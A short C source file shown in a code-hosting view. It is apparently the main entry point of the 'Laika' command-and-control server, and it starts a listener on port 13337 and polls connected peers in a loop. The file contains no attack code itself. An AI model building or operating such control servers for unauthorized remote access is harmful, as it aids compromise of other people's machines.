Laika/cnc/src/main.c

16 lines
283 B
C
Raw Normal View History

#include <stdio.h>
#include "cnc.h"
int main(int argv, char **argc) {
struct sLaika_cnc *cnc = laikaC_newCNC(13337);
while (true) {
if (!laikaC_pollPeers(cnc, 1000)) {
printf("no events!\n");
}
}
printf("cnc killed\n");
return 0;
}